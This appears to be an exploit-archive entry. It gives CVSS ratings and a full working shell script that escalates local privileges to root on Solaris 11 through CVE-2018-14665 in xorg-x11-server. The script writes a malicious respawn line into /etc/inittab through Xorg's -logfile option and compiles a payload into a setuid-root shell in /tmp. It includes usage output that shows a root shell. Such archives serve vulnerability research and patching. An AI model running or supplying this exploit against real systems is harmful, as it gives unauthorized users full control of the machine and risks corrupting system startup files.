xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation

2019-01-1400:00:00

Marco Ivaldi

6.6 Medium

CVSS3

Attack Vector

PHYSICAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

JSON

xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation

#!/bin/sh

# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)
# Date: 2018-11-25
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: Oracle Solaris 11.4
# CVE : CVE-2018-14665

#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <[email protected]>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission 
# check for -modulepath and -logfile options when starting Xorg. X server 
# allows unprivileged users with the ability to log in to the system via 
# physical console to escalate their privileges and run arbitrary code under 
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with 
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't 
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r--   1 root     staff      13870 nov 24 22:01 /etc/inittab
# -rw-r--r--   1 root     sys          967 nov 24 20:01 /etc/inittab.old
# -rwsrwxrwx   1 root     root     1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>"

# prepare the payload
cat << EOF > /tmp/solgasm
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
chmod 4777 /tmp/pwned
EOF
chmod +x /tmp/solgasm

# trigger the bug
PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)
cd /etc
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
sleep 5
pkill Xorg

# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
until [ -u /tmp/pwned ]; do sleep 1; done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned